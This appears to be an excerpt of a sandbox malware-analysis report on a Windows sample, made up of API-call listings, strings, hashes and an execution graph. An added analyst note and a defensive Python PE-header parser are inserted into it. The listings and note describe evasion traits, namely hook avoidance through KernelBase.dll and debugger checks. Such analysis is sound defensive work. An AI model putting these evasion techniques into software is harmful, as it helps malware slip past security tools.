                                                                              • String ID: C:\Windows\System32\KernelBase.dll$LoadLibraryExA
                                                                              • API String ID: 2083169754-1650066521
                                                                              • Opcode ID: 7af8ea7c186e0c9ba372a8bd72242afb008df6f4e0c1456a4f19371e26a2d0b3
                                                                              • Instruction ID: 74249c343a8660f0a1e75262a3383b0a5646ca4d6f9bddac1834bdc16966bac7
                                                                              • Opcode Fuzzy Hash: 7af8ea7c186e0c9ba372a8bd72242afb008df6f4e0c1456a4f19371e26a2d0b3
                                                                              • Instruction Fuzzy Hash: 97313071640205BBEF20DBACCC89F9A77ACEF45378F044554FA189A281D774E950CBA0
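The three IsBadReadPtr probe sizes in this function, 2, 4 and 0x14 bytes, are the sizes of the MZ signature, the PE signature and IMAGE_FILE_HEADER, so the function reads like a loader validating a module image before parsing it by hand; that reading is mine, the report does not state it. Fetching LoadLibraryExA from KernelBase.dll by name rather than through the kernel32.dll import is also consistent with avoiding user-mode hooks placed only on the kernel32 export. The Python below is an added example, not code from the sample or from Joe Sandbox: it performs the same header walk over a byte buffer, with an explicit bounds check standing in for IsBadReadPtr, and rejects truncated or mis-pointed headers instead of reading past the buffer. The image it builds is constructed and is not a real executable. One caveat for anyone porting this back to Windows C: Microsoft documents IsBadReadPtr as obsolete and says it does not guarantee the memory is safe to touch, so its presence in a sample is a fingerprint worth noting, not a pattern to copy.

```python
"""Added example: the header walk implied by the IsBadReadPtr(2/4/0x14) probes
above, written as a Python parser over a byte buffer.

Not code from the sample or from Joe Sandbox. Offsets and sizes are the public
PE layout; the sample image is constructed and is not a real executable."""
import struct

IMAGE_DOS_SIGNATURE = b"MZ"      # 2-byte probe
IMAGE_NT_SIGNATURE = b"PE\0\0"   # 4-byte probe
FILE_HEADER_SIZE = 0x14          # sizeof(IMAGE_FILE_HEADER): the 20-byte probe
SECTION_HEADER_SIZE = 40         # sizeof(IMAGE_SECTION_HEADER)
E_LFANEW_OFFSET = 0x3C
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B


class BadImage(ValueError):
    """Raised where a loader should bail out instead of reading past the buffer."""


def readable(buf, offset, size):
    """Bounds check standing in for IsBadReadPtr(ptr, size): the whole
    [offset, offset + size) range must lie inside the buffer."""
    return 0 <= offset and offset + size <= len(buf)


def parse_headers(buf):
    """Validate DOS header -> PE signature -> IMAGE_FILE_HEADER -> optional
    header magic -> section table, returning what a manual mapper needs next."""
    if not readable(buf, 0, 2) or buf[:2] != IMAGE_DOS_SIGNATURE:
        raise BadImage("missing MZ signature")
    if not readable(buf, E_LFANEW_OFFSET, 4):
        raise BadImage("truncated IMAGE_DOS_HEADER")
    e_lfanew = struct.unpack_from("<I", buf, E_LFANEW_OFFSET)[0]
    if not readable(buf, e_lfanew, 4) or buf[e_lfanew:e_lfanew + 4] != IMAGE_NT_SIGNATURE:
        raise BadImage("e_lfanew does not point at a PE signature")
    fh = e_lfanew + 4
    if not readable(buf, fh, FILE_HEADER_SIZE):
        raise BadImage("truncated IMAGE_FILE_HEADER")
    (machine, n_sections, _timestamp, _symtab, _n_syms,
     opt_size, characteristics) = struct.unpack_from("<HHIIIHH", buf, fh)
    opt = fh + FILE_HEADER_SIZE
    if opt_size < 2 or not readable(buf, opt, opt_size):
        raise BadImage("truncated IMAGE_OPTIONAL_HEADER")
    magic = struct.unpack_from("<H", buf, opt)[0]
    if magic not in (PE32_MAGIC, PE32PLUS_MAGIC):
        raise BadImage("unknown optional header magic 0x%X" % magic)
    # The section table follows the optional header; check it here so a mapper
    # can iterate it without further probes.
    section_table = opt + opt_size
    if not readable(buf, section_table, SECTION_HEADER_SIZE * n_sections):
        raise BadImage("truncated section table")
    return {"e_lfanew": e_lfanew, "machine": machine, "sections": n_sections,
            "characteristics": characteristics, "magic": magic,
            "section_table": section_table}


def is_valid_image(buf):
    """True when every header a loader touches lies inside the buffer."""
    try:
        parse_headers(buf)
        return True
    except BadImage:
        return False


def build_sample_image():
    """Constructed minimal PE32 header: MZ stub, PE signature, one-section
    file header, 0xE0-byte optional header and one zeroed section entry."""
    dos = bytearray(0x40)
    dos[:2] = IMAGE_DOS_SIGNATURE
    struct.pack_into("<I", dos, E_LFANEW_OFFSET, 0x40)
    file_header = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x102)
    optional = struct.pack("<H", PE32_MAGIC) + bytes(0xE0 - 2)
    return (bytes(dos) + IMAGE_NT_SIGNATURE + file_header + optional
            + bytes(SECTION_HEADER_SIZE))


if __name__ == "__main__":
    print(parse_headers(build_sample_image()))
```

Every probe size in the function above corresponds to one `readable` call here; a mapper that carries on past the returned `section_table` offset should keep applying the same check to each section's raw data range before copying it.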
                                                                              APIs
                                                                              • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 029828CE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message
                                                                              • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                              • API String ID: 2030045667-32948583
                                                                              • Opcode ID: 590b1cdf0ec9de8856d1c1c6d3cc77d6f3f5087edd0877b94d2d1d3fb3dec49b
                                                                              • Instruction ID: 314c450f3b8f66780af3b8b00c9e47fb84a5a0c5c1ead0360d416b9611850049
                                                                              • Opcode Fuzzy Hash: 590b1cdf0ec9de8856d1c1c6d3cc77d6f3f5087edd0877b94d2d1d3fb3dec49b
                                                                              • Instruction Fuzzy Hash: 1AA1E230E043D48BDF21BB2CCC84BA9B7E9EB49750F1840E5ED49AB285CB759985CF51
Strings
• , xrefs: 02982814
• bytes: , xrefs: 0298275D
• The sizes of unexpected leaked medium and large blocks are: , xrefs: 02982849
• 7, xrefs: 029826A1
• An unexpected memory leak has occurred. , xrefs: 02982690
• Unexpected Memory Leak, xrefs: 029828C0
• The unexpected small block leaks are:, xrefs: 02982707
Memory Dump Source
• Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
Yara matches
Similarity
• API ID:
• String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
• API String ID: 0-2723507874
APIs
• GetThreadLocale.KERNEL32(00000000,0298C01B,?,?,00000000,00000000), ref: 0298BD86
  • Part of subcall function 0298A754: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0298A772
Strings
Memory Dump Source
• Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
Yara matches
Similarity
• API ID: Locale$InfoThread
• String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
• API String ID: 4232894706-2493093252
APIs
• GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029843F3,?,?,029D67C8,?,?,029AB7A8,0298655D,029AA30D), ref: 02984365
• WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029843F3,?,?,029D67C8,?,?,029AB7A8,0298655D,029AA30D), ref: 0298436B
• GetStdHandle.KERNEL32(000000F5,029843B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029843F3,?,?,029D67C8), ref: 02984380
• WriteFile.KERNEL32(00000000,000000F5,029843B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029843F3,?,?), ref: 02984386
• MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 029843A4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
Yara matches
Similarity
• API ID: FileHandleWrite$Message
• String ID: Error$Runtime error at 00000000
• API String ID: 1570097196-2970929446
APIs
• GetModuleHandleW.KERNEL32(KernelBase,00000000,02997C60,00000000,00000000,00000000,00000000,00000000,oces,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02997BDE
• GetProcAddress.KERNEL32(00000000,KernelBase), ref: 02997BE4
• GetCurrentProcess.KERNELBASE ref: 02997BEE
Strings
Memory Dump Source
• Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
Yara matches
Similarity
• API ID: AddressCurrentHandleModuleProcProcess
• String ID: GetCurre$KernelBase$oces
• API String ID: 4190356694-953896676
APIs
  • Part of subcall function 0298ACCC: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0298ACE9
  • Part of subcall function 0298ACCC: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0298AD0D
  • Part of subcall function 0298ACCC: GetModuleFileNameA.KERNEL32(02980000,?,00000105), ref: 0298AD28
  • Part of subcall function 0298ACCC: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0298ADBE
• CharToOemA.USER32(?,?), ref: 0298AE8B
• GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0298AEA8
• WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0298AEAE
• GetStdHandle.KERNEL32(000000F4,0298AF18,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0298AEC3
• WriteFile.KERNEL32(00000000,000000F4,0298AF18,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0298AEC9
• LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 0298AEEB
• MessageBoxA.USER32(00000000,?,?,00002010), ref: 0298AF01
Memory Dump Source
• Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
Yara matches
Similarity
• API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
• String ID:
• API String ID: 185507032-0
APIs
• SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0298E5B5
• SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0298E5D1
• SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0298E60A
• SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0298E687
• SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0298E6A0
• VariantCopy.OLEAUT32(?,00000000), ref: 0298E6D5
Memory Dump Source
• Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
Yara matches
Similarity
• API ID: ArraySafe$BoundIndex$CopyCreateVariant
• String ID:
• API String ID: 351091851-0
APIs
• RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0298358A
• RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,029835D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 029835BD
• RegCloseKey.ADVAPI32(?,029835E0,00000000,?,00000004,00000000,029835D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 029835D3
Strings
Memory Dump Source
• Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
• API String ID: 3677997916-4173385793
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,02986BD8,02980000,029AB790), ref: 029858D1
• GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 029858E8
• lstrcpynA.KERNEL32(?,?,?), ref: 02985918
• lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02986BD8,02980000,029AB790), ref: 0298597C
• lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02986BD8,02980000,029AB790), ref: 029859B2
• FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02986BD8,02980000,029AB790), ref: 029859C5
• FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02986BD8,02980000,029AB790), ref: 029859D7
• lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02986BD8,02980000,029AB790), ref: 029859E3
• lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02986BD8,02980000), ref: 02985A17
• lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02986BD8), ref: 02985A23
• lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02985A45
Strings
Memory Dump Source
• Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
Yara matches
Similarity
• API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
• String ID: GetLongPathNameA$kernel32.dll
• API String ID: 3245196872-3214324292
APIs
• GetThreadLocale.KERNEL32(?,00000000,0298AA77,?,?,00000000), ref: 0298A9F8
  • Part of subcall function 0298A754: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0298A772
• GetThreadLocale.KERNEL32(00000000,00000004,00000000,0298AA77,?,?,00000000), ref: 0298AA28
• EnumCalendarInfoA.KERNEL32(Function_0000A92C,00000000,00000000,00000004), ref: 0298AA33
• GetThreadLocale.KERNEL32(00000000,00000003,00000000,0298AA77,?,?,00000000), ref: 0298AA51
• EnumCalendarInfoA.KERNEL32(Function_0000A968,00000000,00000000,00000003), ref: 0298AA5C
Memory Dump Source
• Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
Yara matches
Similarity
• API ID: Locale$InfoThread$CalendarEnum
• String ID:
• API String ID: 4102113445-0
APIs
• GetThreadLocale.KERNEL32(?,00000000,0298AC60,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0298AABF
  • Part of subcall function 0298A754: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0298A772
Strings
Memory Dump Source
• Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
Yara matches
Similarity
• API ID: Locale$InfoThread
• String ID: eeee$ggg$yyyy
• API String ID: 4232894706-1253427255
APIs
• GetModuleHandleW.KERNEL32(KernelBase,?,0299DD01,ScanString,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C,UacScan,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C,Initialize), ref: 0299D8CA
• GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 0299D8DC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
Yara matches
Similarity
• API ID: AddressHandleModuleProc
• String ID: IsDebuggerPresent$KernelBase
• API String ID: 1646373207-2367923768
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,?,029AA10B,00000000,029AA11E), ref: 0298C40A
• GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0298C41B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
Yara matches
Similarity
• API ID: AddressHandleModuleProc
• String ID: GetDiskFreeSpaceExA$kernel32.dll
• API String ID: 1646373207-3712701948
APIs
• SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0298E227
• SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0298E243
• SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0298E2BA
• VariantClear.OLEAUT32(?), ref: 0298E2E3
Memory Dump Source
• Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
Similarity
• API ID: ArraySafe$Bound$ClearIndexVariant
• API String ID: 920484758-0
• Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
• Instruction ID: 55ebdf8f66d9795e3aa262aa869912fc4c94fc3bfca573595d0890dce04a71bc
• Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
• Instruction Fuzzy Hash: FB411C75A0022D9FCB65EB68CC90BD9B3BDAF88714F0441E5F589E7251DA30AF818F61

APIs
• VirtualQuery.KERNEL32(?,?,0000001C), ref: 0298ACE9
• GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0298AD0D
• GetModuleFileNameA.KERNEL32(02980000,?,00000105), ref: 0298AD28
• LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0298ADBE
Memory Dump Source
• Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
Similarity
• API ID: FileModuleName$LoadQueryStringVirtual
• API String ID: 3990497365-0
• Opcode ID: 799f6075530c0b0080efcfae0e87e4b0b11e83c7f5523921ad342b0495984a9a
• Instruction ID: 83043edd16eed198f4d8a76a097c85cba3b81850257fb697dc0913bb6b524222
• Opcode Fuzzy Hash: 799f6075530c0b0080efcfae0e87e4b0b11e83c7f5523921ad342b0495984a9a
• Instruction Fuzzy Hash: 71412D71A402589BDB21EB68CC84BDAB7FDAF48300F4804EAA548E7251EB749F848F54

APIs
• VirtualQuery.KERNEL32(?,?,0000001C), ref: 0298ACE9
• GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0298AD0D
• GetModuleFileNameA.KERNEL32(02980000,?,00000105), ref: 0298AD28
• LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0298ADBE
Memory Dump Source
• Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
Similarity
• API ID: FileModuleName$LoadQueryStringVirtual
• API String ID: 3990497365-0
• Opcode ID: a6072fa102434fdf9c75bdb2d4688369011f9bf3c97d9cd05972d479d9936336
• Instruction ID: 888fcb39b8c3eebfaec6579cf7306df5e7a26fbcb0c9da19410e99b7e0cba612
• Opcode Fuzzy Hash: a6072fa102434fdf9c75bdb2d4688369011f9bf3c97d9cd05972d479d9936336
• Instruction Fuzzy Hash: 9A411071A4035C9BDB21EB58CC84BDAB7FDAF48701F4804EAA648E7251EB749F848F54

Memory Dump Source
• Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
Similarity
• Opcode ID: 878b4e4ace729b594958bc90bdaf02c6e45dc36187309e31bc3bc9624d5e669f
• Instruction ID: 3bb40fc858f1193d3e74cfc4cfc815396e246869138fc9e9a357e97959b13fd6
• Opcode Fuzzy Hash: 878b4e4ace729b594958bc90bdaf02c6e45dc36187309e31bc3bc9624d5e669f
• Instruction Fuzzy Hash: EAA1B1A77116010BD718BA7C9C843BDB3D6DBC4225F1D827EE11DCB391EB68C9538690

APIs
• GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,0298956A), ref: 02989502
• GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,0298956A), ref: 02989508
Memory Dump Source
• Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
Similarity
• API ID: DateFormatLocaleThread
• String ID: yyyy
• API String ID: 3303714858-3145165042
• Opcode ID: e436dbf712a6c4741162dbd326eaf5c979b0afee7d3629e2ad74eb6250048c6e
• Instruction ID: 44ccbe33b2e31bb3c67f5141c5794be653274bc1a312782d3dd51cffa446f728
• Opcode Fuzzy Hash: e436dbf712a6c4741162dbd326eaf5c979b0afee7d3629e2ad74eb6250048c6e
• Instruction Fuzzy Hash: 00212175A042189FEB11EFA8C881ABE73F9EF49710F5900A5ED09EB340D6349E44CBA1

APIs
• IsBadReadPtr.KERNEL32(?,00000004,?,00000004,?,00000008), ref: 0299A334
• IsBadWritePtr.KERNEL32(?,00000004,?,00000004,?,00000004,?,00000008), ref: 0299A364
• IsBadReadPtr.KERNEL32(?,00000008), ref: 0299A383
• IsBadReadPtr.KERNEL32(?,00000004,?,00000008), ref: 0299A38F
Memory Dump Source
• Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
Similarity
• API ID: Read$Write
• API String ID: 3448952669-0
• Opcode ID: 125398054db11b0a7d28bdcb38f3ec80ccab89663a3b9969c73509c4f36971dc
• Instruction ID: e9bb0723eaa7c96bbb6bb014c798748f147d6f1ca3b34182ac5dfc2b31ff67bd
• Opcode Fuzzy Hash: 125398054db11b0a7d28bdcb38f3ec80ccab89663a3b9969c73509c4f36971dc
• Instruction Fuzzy Hash: A021937164121AABDF20DF6DCC81BAE77ADEF813B5F048515ED149B344EB34E9118AA0

Execution Graph

Execution Coverage: 12.3%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0.7%
Total number of Nodes: 2000
Total number of Limit Nodes: 23
8151 405dbd 8150->8151 8152 40e180 TlsGetValue 8151->8152 8153 405de0 8152->8153 8154 40e200 2 API calls 8153->8154 8155 405dec 8154->8155 8156 401ce9 8155->8156 8207 40e2d0 TlsGetValue 8155->8207 8158 405182 TlsGetValue 8156->8158 8158->7552 8208 40d020 8159->8208 8162 405182 TlsGetValue 8162->7556 8163->7562 8165 40dfe2 8164->8165 8166 40dfd3 wcslen 8164->8166 8167 40e200 2 API calls 8165->8167 8166->8165 8168 40dfed 8167->8168 8168->7564 8169->7568 8170->7570 8171->7572 8172->7574 8173->7578 8174->7584 8175->7586 8177 405ece 8176->8177 8178 40e180 TlsGetValue 8177->8178 8179 405eea 8178->8179 8180 40e200 2 API calls 8179->8180 8181 405ef6 8180->8181 8183 405f02 8181->8183 8224 40e2d0 TlsGetValue 8181->8224 8183->7588 8225 40d288 TlsGetValue 8184->8225 8189 40de20 GetLastError TlsGetValue SetLastError 8189->7595 8190->7599 8192 40d288 16 API calls 8191->8192 8193 409825 8192->8193 8194 4096da 17 API calls 8193->8194 8195 409838 8194->8195 8196 40e200 2 API calls 8195->8196 8197 409846 8196->8197 8234 40e350 TlsGetValue 8197->8234 8199 401dc9 8200 40e020 TlsGetValue 8199->8200 8200->7607 8235 40e6a0 TlsGetValue 8201->8235 8203 40516a 8203->7613 8204->7615 8205->7617 8206->8142 8207->8156 8209 40d032 8208->8209 8210 40d07d 8209->8210 8213 40d052 8209->8213 8211 40d1c0 2 API calls 8210->8211 8212 401cf6 8211->8212 8212->8162 8217 411e80 8213->8217 8215 40d058 8223 411e70 ??3@YAXPAX 8215->8223 8218 411ef4 malloc 8217->8218 8219 411e8c WideCharToMultiByte 8217->8219 8218->8215 8219->8218 8221 411ec0 malloc 8219->8221 8221->8218 8222 411ed2 WideCharToMultiByte 8221->8222 8222->8215 8223->8210 8224->8183 8226 40d29b RtlAllocateHeap TlsSetValue 8225->8226 8229 409809 8225->8229 8227 40d2c7 8226->8227 8228 411d62 13 API calls 8227->8228 8228->8229 8230 4096da 8229->8230 8231 40d288 16 API calls 8230->8231 8232 4096eb GetCommandLineW 8231->8232 8233 401dab 8232->8233 8233->7593 8233->8189 8234->8199 8235->8203 8237 40e200 2 API calls 8236->8237 8238 405d6b 8237->8238 
8238->7663 8239->7649 8240->7674 8242 40327b 8241->8242 8242->8242 8243 40df60 21 API calls 8242->8243 8244 40328d 8243->8244 8245 4051a0 3 API calls 8244->8245 8246 403296 8245->8246 9102 405060 8246->9102 8249 405060 2 API calls 8250 4032af 8249->8250 9105 402bc1 8250->9105 8253 4032b8 9112 40559a GetVersionExW 8253->9112 8254 4032cb 8257 4032d5 8254->8257 8258 40343b 8254->8258 9118 40de20 GetLastError TlsGetValue SetLastError 8257->9118 9150 40de20 GetLastError TlsGetValue SetLastError 8258->9150 8261 403441 9151 40de20 GetLastError TlsGetValue SetLastError 8261->9151 8262 4032db 9119 40de20 GetLastError TlsGetValue SetLastError 8262->9119 8265 403449 8267 406260 2 API calls 8265->8267 8266 4032e3 9120 406260 8266->9120 8269 403455 8267->8269 8272 40de60 3 API calls 8269->8272 8271 40de60 3 API calls 8273 4032f9 GetWindowsDirectoryW PathAddBackslashW 8271->8273 8274 40345f GetSystemDirectoryW PathAddBackslashW 8272->8274 9123 40de20 GetLastError TlsGetValue SetLastError 8273->9123 8325 403439 8274->8325 8276 40331a 8278 40dfc0 3 API calls 8276->8278 8281 403322 8278->8281 8279 403480 8280 40dfc0 3 API calls 8279->8280 8282 403488 8280->8282 8283 40dfc0 3 API calls 8281->8283 9111 405170 TlsGetValue 8282->9111 8285 40332d 8283->8285 8287 40de60 3 API calls 8285->8287 8286 40348f 8290 40def0 HeapFree 8286->8290 8288 403337 PathAddBackslashW 8287->8288 9124 40de20 GetLastError TlsGetValue SetLastError 8288->9124 8292 4034a7 8290->8292 8291 40334a 8293 40dfc0 3 API calls 8291->8293 8294 40def0 HeapFree 8292->8294 8295 403352 8293->8295 8296 4034af 8294->8296 8297 40dfc0 3 API calls 8295->8297 8298 40def0 HeapFree 8296->8298 8300 40335c 8297->8300 8299 4034b8 8298->8299 8302 40def0 HeapFree 8299->8302 8301 40de60 3 API calls 8300->8301 8303 403366 8301->8303 8304 4034c1 8302->8304 9125 40de20 GetLastError TlsGetValue SetLastError 8303->9125 8306 40def0 HeapFree 8304->8306 8308 4034ca 8306->8308 8307 403370 8309 40dfc0 3 API calls 8307->8309 8308->7681 8310 403378 
8309->8310 8311 40dfc0 3 API calls 8310->8311 8312 403382 8311->8312 8313 40dfc0 3 API calls 8312->8313 8314 40338c 8313->8314 8315 40de60 3 API calls 8314->8315 8316 403396 8315->8316 9126 40ad60 8316->9126 8318 4033a4 8319 4033ba 8318->8319 9136 40a970 8318->9136 8321 40ad60 10 API calls 8319->8321 8322 4033d2 8321->8322 8323 4033e8 8322->8323 8324 40a970 10 API calls 8322->8324 8323->8325 9148 40de20 GetLastError TlsGetValue SetLastError 8323->9148 8324->8323 9110 40de20 GetLastError TlsGetValue SetLastError 8325->9110 8327 403404 9149 40de20 GetLastError TlsGetValue SetLastError 8327->9149 8329 40340c 8330 406260 2 API calls 8329->8330 8331 403418 8330->8331 8332 40de60 3 API calls 8331->8332 8333 403422 GetSystemDirectoryW PathAddBackslashW 8332->8333 8333->8325 8334->7687 8335->7689 8336->7691 8337->7693 8338->7697 8339->7703 8340->7705 8341->7707 8342->7709 8343->7713 8345 40df60 21 API calls 8344->8345 8346 402eaa 8345->8346 8347 405060 2 API calls 8346->8347 8348 402eb6 FindResourceW 8347->8348 8349 402ed5 